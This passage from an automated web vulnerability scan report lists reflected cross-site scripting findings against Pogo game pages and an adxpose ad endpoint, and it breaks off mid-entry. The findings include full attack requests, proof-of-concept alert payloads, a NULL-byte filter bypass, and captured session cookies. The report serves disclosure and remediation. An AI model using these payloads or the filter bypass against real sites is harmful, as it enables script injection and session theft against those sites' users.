NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /Category.aspx?code=1000&refId=Hot_Sellers818ae"style%3d"x%3aexpr/**/ession(alert(1))"026389c2ee8 HTTP/1.1 Host: download-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; 117734103=Sat%20Jan%2008%202011%2019%3A28%3A34%20GMT%2D0600%20(Central%20Standard%20Time); OberonPogoComb=http%3A//download-games.pogo.com/%3Fsite%3Dpogo%26refid%3Dheadernav_fp_shopmenu%26ifw%3D756%26pageSection%3Dheader_downloads_store%26ifh%3D210%26lkey%3Dx; 11964850=Sat%20Jan%2008%202011%2019%3A28%3A45%20GMT%2D0600%20(Central%20Standard%20Time);
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Content-Length: 63956 Cache-Control: private, max-age=14353 Date: Sun, 09 Jan 2011 02:10:06 GMT Connection: close
The value of the RefID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %008cad4"%3balert(1)//fef0500bb88 was submitted in the RefID parameter. This input was echoed as 8cad4";alert(1)//fef0500bb88 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /deluxe.aspx?code=119761357&RefID=pogofree010711%008cad4"%3balert(1)//fef0500bb88 HTTP/1.1 Host: download-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; 117734103=Sat%20Jan%2008%202011%2019%3A28%3A34%20GMT%2D0600%20(Central%20Standard%20Time); OberonPogoComb=http%3A//download-games.pogo.com/%3Fsite%3Dpogo%26refid%3Dheadernav_fp_shopmenu%26ifw%3D756%26pageSection%3Dheader_downloads_store%26ifh%3D210%26lkey%3Dx; 11964850=Sat%20Jan%2008%202011%2019%3A28%3A45%20GMT%2D0600%20(Central%20Standard%20Time);
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Content-Length: 39950 Cache-Control: private, max-age=14373 Date: Sun, 09 Jan 2011 02:08:55 GMT Connection: close
<script type="text/javascript" language="javascript" src="/JavaScri ...[SNIP]... les */ var s_state="" var s_zip="" var s_purchaseID="" var s_events="prodView" var s_products="newGames;Cake Mania To The Max" var s_eVar1="" var s_eVar2="" var s_eVar6="pogofree010711.8cad4";alert(1)//fef0500bb88"; var s_eVar7="Game Page"; var s_eVar10="oberonpogostd"; var s_Prop10="oberonpogostd";
/* You may add or alter any code config here. */ var s_server="102"; var s_ ...[SNIP]...
The value of the RefID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c86f7"%3b2ec25516e2f was submitted in the RefID parameter. This input was echoed as c86f7";2ec25516e2f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deluxe.aspx?code=119714967&genre=Puzzle&RefID=c86f7"%3b2ec25516e2f&Session=&origin=HPTemplateGameList&ln=en HTTP/1.1 Host: download-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; 117734103=Sat%20Jan%2008%202011%2019%3A28%3A34%20GMT%2D0600%20(Central%20Standard%20Time); OberonPogoComb=http%3A//download-games.pogo.com/%3Fsite%3Dpogo%26refid%3Dheadernav_fp_shopmenu%26ifw%3D756%26pageSection%3Dheader_downloads_store%26ifh%3D210%26lkey%3Dx; 11964850=Sat%20Jan%2008%202011%2019%3A28%3A45%20GMT%2D0600%20(Central%20Standard%20Time);
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Content-Length: 48209 Cache-Control: private, max-age=14385 Date: Sun, 09 Jan 2011 02:08:58 GMT Connection: close
<script type="text/javascript" language="javascript" src="/JavaScri ...[SNIP]... ommerce Variables */ var s_state="" var s_zip="" var s_purchaseID="" var s_events="prodView" var s_products="puzzle;Cradle Of Rome 2 Premium" var s_eVar1="" var s_eVar2="" var s_eVar6="c86f7";2ec25516e2f"; var s_eVar7="Game Page"; var s_eVar10="oberonpogostd"; var s_Prop10="oberonpogostd";
/* You may add or alter any code config here. */ var s_server="103"; var s_ ...[SNIP]...
The value of the RefID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1d1b"style%3d"x%3aexpr/**/ession(alert(1))"3e8fc95c0c2 was submitted in the RefID parameter. This input was echoed as a1d1b"style="x:expr/**/ession(alert(1))"3e8fc95c0c2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deluxe.aspx?code=119761357&RefID=pogofree010711a1d1b"style%3d"x%3aexpr/**/ession(alert(1))"3e8fc95c0c2 HTTP/1.1 Host: download-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; 117734103=Sat%20Jan%2008%202011%2019%3A28%3A34%20GMT%2D0600%20(Central%20Standard%20Time); OberonPogoComb=http%3A//download-games.pogo.com/%3Fsite%3Dpogo%26refid%3Dheadernav_fp_shopmenu%26ifw%3D756%26pageSection%3Dheader_downloads_store%26ifh%3D210%26lkey%3Dx; 11964850=Sat%20Jan%2008%202011%2019%3A28%3A45%20GMT%2D0600%20(Central%20Standard%20Time);
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Content-Length: 41016 Cache-Control: private, max-age=14386 Date: Sun, 09 Jan 2011 02:08:48 GMT Connection: close
The value of the RefID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 481fc"style%3d"x%3aexpr/**/ession(alert(1))"ad9a6c7f32 was submitted in the RefID parameter. This input was echoed as 481fc"style="x:expr/**/ession(alert(1))"ad9a6c7f32 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /deluxe.aspx?code=119714967&genre=Puzzle&RefID=481fc"style%3d"x%3aexpr/**/ession(alert(1))"ad9a6c7f32&Session=&origin=HPTemplateGameList&ln=en HTTP/1.1 Host: download-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; 117734103=Sat%20Jan%2008%202011%2019%3A28%3A34%20GMT%2D0600%20(Central%20Standard%20Time); OberonPogoComb=http%3A//download-games.pogo.com/%3Fsite%3Dpogo%26refid%3Dheadernav_fp_shopmenu%26ifw%3D756%26pageSection%3Dheader_downloads_store%26ifh%3D210%26lkey%3Dx; 11964850=Sat%20Jan%2008%202011%2019%3A28%3A45%20GMT%2D0600%20(Central%20Standard%20Time);
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Content-Length: 50333 Cache-Control: private, max-age=14400 Date: Sun, 09 Jan 2011 02:08:56 GMT Connection: close
The value of the origin request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f38fc"style%3d"x%3aexpr/**/ession(alert(1))"e6b6265f679 was submitted in the origin parameter. This input was echoed as f38fc"style="x:expr/**/ession(alert(1))"e6b6265f679 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deluxe.aspx?code=119714967&genre=Puzzle&RefID=headernav_fp_shopmenu&Session=&origin=HPTemplateGameListf38fc"style%3d"x%3aexpr/**/ession(alert(1))"e6b6265f679&ln=en HTTP/1.1 Host: download-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; 117734103=Sat%20Jan%2008%202011%2019%3A28%3A34%20GMT%2D0600%20(Central%20Standard%20Time); OberonPogoComb=http%3A//download-games.pogo.com/%3Fsite%3Dpogo%26refid%3Dheadernav_fp_shopmenu%26ifw%3D756%26pageSection%3Dheader_downloads_store%26ifh%3D210%26lkey%3Dx; 11964850=Sat%20Jan%2008%202011%2019%3A28%3A45%20GMT%2D0600%20(Central%20Standard%20Time);
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Content-Length: 51683 Cache-Control: private, max-age=14366 Date: Sun, 09 Jan 2011 02:09:35 GMT Connection: close
The value of the refid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00fb3e9"-alert(1)-"008cc735cb4 was submitted in the refid parameter. This input was echoed as fb3e9"-alert(1)-"008cc735cb4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /deluxe.aspx?code=11964850&refid=14hero_bj3b%00fb3e9"-alert(1)-"008cc735cb4&intcmp=14hero_bj3b&pageSection=free_home_spotlight HTTP/1.1 Host: download-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; 117734103=Sat%20Jan%2008%202011%2019%3A28%3A34%20GMT%2D0600%20(Central%20Standard%20Time); OberonPogoComb=http%3A//download-games.pogo.com/%3Fsite%3Dpogo%26refid%3Dheadernav_fp_shopmenu%26ifw%3D756%26pageSection%3Dheader_downloads_store%26ifh%3D210%26lkey%3Dx; 11964850=Sat%20Jan%2008%202011%2019%3A28%3A45%20GMT%2D0600%20(Central%20Standard%20Time);
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Content-Length: 49260 Cache-Control: private, max-age=14400 Date: Sun, 09 Jan 2011 02:08:54 GMT Connection: close
<script type="text/javascript" language="javascript" src="/JavaScri ...[SNIP]... commerce Variables */ var s_state="" var s_zip="" var s_purchaseID="" var s_events="prodView" var s_products="puzzle;Bejeweled 3" var s_eVar1="" var s_eVar2="" var s_eVar6="14hero_bj3b.fb3e9"-alert(1)-"008cc735cb4"; var s_eVar7="Game Page"; var s_eVar10="oberonpogostd"; var s_Prop10="oberonpogostd";
/* You may add or alter any code config here. */ var s_server="103"; var s_ ...[SNIP]...
The value of the refid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e35b8"style%3d"x%3aexpr/**/ession(alert(1))"2417bd62531 was submitted in the refid parameter. This input was echoed as e35b8"style="x:expr/**/ession(alert(1))"2417bd62531 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deluxe.aspx?code=11964850&refid=14ma_bj3e35b8"style%3d"x%3aexpr/**/ession(alert(1))"2417bd62531&pageSection=free_home_marketing_alley HTTP/1.1 Host: download-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; 117734103=Sat%20Jan%2008%202011%2019%3A28%3A34%20GMT%2D0600%20(Central%20Standard%20Time); OberonPogoComb=http%3A//download-games.pogo.com/%3Fsite%3Dpogo%26refid%3Dheadernav_fp_shopmenu%26ifw%3D756%26pageSection%3Dheader_downloads_store%26ifh%3D210%26lkey%3Dx; 11964850=Sat%20Jan%2008%202011%2019%3A28%3A45%20GMT%2D0600%20(Central%20Standard%20Time);
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Content-Length: 50504 Cache-Control: private, max-age=14356 Date: Sun, 09 Jan 2011 02:08:47 GMT Connection: close
The value of the refid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6cc08"%3balert(1)//ff4a98db4bc was submitted in the refid parameter. This input was echoed as 6cc08";alert(1)//ff4a98db4bc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deluxe.aspx?code=11964850&refid=14ma_bj36cc08"%3balert(1)//ff4a98db4bc&pageSection=free_home_marketing_alley HTTP/1.1 Host: download-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; 117734103=Sat%20Jan%2008%202011%2019%3A28%3A34%20GMT%2D0600%20(Central%20Standard%20Time); OberonPogoComb=http%3A//download-games.pogo.com/%3Fsite%3Dpogo%26refid%3Dheadernav_fp_shopmenu%26ifw%3D756%26pageSection%3Dheader_downloads_store%26ifh%3D210%26lkey%3Dx; 11964850=Sat%20Jan%2008%202011%2019%3A28%3A45%20GMT%2D0600%20(Central%20Standard%20Time);
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Content-Length: 48974 Cache-Control: private, max-age=14353 Date: Sun, 09 Jan 2011 02:08:52 GMT Connection: close
<script type="text/javascript" language="javascript" src="/JavaScri ...[SNIP]... * E-commerce Variables */ var s_state="" var s_zip="" var s_purchaseID="" var s_events="prodView" var s_products="puzzle;Bejeweled 3" var s_eVar1="" var s_eVar2="" var s_eVar6="14ma_bj36cc08";alert(1)//ff4a98db4bc"; var s_eVar7="Game Page"; var s_eVar10="oberonpogostd"; var s_Prop10="oberonpogostd";
/* You may add or alter any code config here. */ var s_server="103"; var s_ ...[SNIP]...
The value of the refid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f64dd"%3balert(1)//6499779a148 was submitted in the refid parameter. This input was echoed as f64dd";alert(1)//6499779a148 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /downloads.aspx?site=pogo&refid=f64dd"%3balert(1)//6499779a148&ifw=756&pageSection=homnav_downloads_store&ifh=210&lkey=x HTTP/1.1 Host: download-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; 117734103=Sat%20Jan%2008%202011%2019%3A28%3A34%20GMT%2D0600%20(Central%20Standard%20Time); OberonPogoComb=http%3A//download-games.pogo.com/%3Fsite%3Dpogo%26refid%3Dheadernav_fp_shopmenu%26ifw%3D756%26pageSection%3Dheader_downloads_store%26ifh%3D210%26lkey%3Dx; 11964850=Sat%20Jan%2008%202011%2019%3A28%3A45%20GMT%2D0600%20(Central%20Standard%20Time);
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Content-Length: 134288 Cache-Control: private, max-age=14351 Date: Sun, 09 Jan 2011 02:11:09 GMT Connection: close
<HTML> <HEAD> <meta name="msvalidate.01" content="F6F676EB374D905262C4FF19D14E715D" /> <meta name="description" content="Download games at Pogo including puzzle games, hidden object games, Pogo ...[SNIP]...
var s_pageName="HomePage" /* E-commerce Variables */ var s_state="" var s_zip="" var s_purchaseID="" var s_events="" var s_products=";" var s_eVar1="" var s_eVar2="" var s_eVar6="f64dd";alert(1)//6499779a148"; var s_eVar7="Home Page"; var s_eVar10="oberonpogostd"; var s_Prop10="oberonpogostd";
/* You may add or alter any code config here. */ var s_server="121"; var s_ ...[SNIP]...
The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 379da<script>alert(1)</script>ca2fdb18c7 was submitted in the uid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fwww.pandora.com%2Fpeople%2F%3Fcf8db%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E09862348e83%3D1&uid=ZC45X9Axu6NOUFfX_261541379da<script>alert(1)</script>ca2fdb18c7&xy=0%2C0&wh=728%2C90&vchannel=65044&cid=101198&cookieenabled=1&screenwh=1920%2C1200&adwh=728%2C90&colordepth=16&flash=10.1&iframed=1 HTTP/1.1 Host: event.adxpose.com Proxy-Connection: keep-alive Referer: http://www.pandora.com/include/communityAdEmbed.html?genre=&artist=&webname=&sz=2000x8&ord=1294536136217419152&clean=0&spgs=0&tile=2&_id=bottom_leaderboard_container Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: evlu=ddad3821-ec58-4641-be95-961ec5aac4d2
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=7120D2DE321902B7B3818D64D2E6B825; Path=/ Cache-Control: no-store Content-Type: text/javascript;charset=UTF-8 Content-Length: 144 Date: Sun, 09 Jan 2011 02:14:36 GMT Connection: close
if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("ZC45X9Axu6NOUFfX_261541379da<script>alert(1)</script>ca2fdb18c7");
3.492. http://flash-games.pogo.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://flash-games.pogo.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67868"><script>alert(1)</script>789ef577dda was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?67868"><script>alert(1)</script>789ef577dda=1 HTTP/1.1 Host: flash-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook. ...[SNIP]... <link rel="canonical" href="http://flash-games.pogo.com/?67868"><script>alert(1)</script>789ef577dda=1"/> ...[SNIP]...
3.493. http://game3.pogo.com/exhibit/game/game.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://game3.pogo.com
Path: /exhibit/game/game.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 538d5"%3balert(1)//b87d69317dd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 538d5";alert(1)//b87d69317dd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /exhibit/game/game.jsp?site=pogo&game=scrabble&lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.&init=1&538d5"%3balert(1)//b87d69317dd=1 HTTP/1.1 Host: game3.pogo.com Proxy-Connection: keep-alive Referer: http://game3.pogo.com/room/game/frameset.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&install=true&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&vmtype=sun&rhst=www.pogo.com&vmver=1.6.0_23&game=scrabble&auto=PlayNow Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
The value of the ahst request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8279c"><script>alert(1)</script>c01d161abf6 was submitted in the ahst parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /room/loading/init.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=8279c"><script>alert(1)</script>c01d161abf6&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow HTTP/1.1 Host: game3.pogo.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/games/scrabble?pageSection=free_home_hot_games1_pl_scrabble Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536852604-New%7C1297128852604%3B
The value of the anam request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 481a1"><script>alert(1)</script>576b5d6378a was submitted in the anam parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
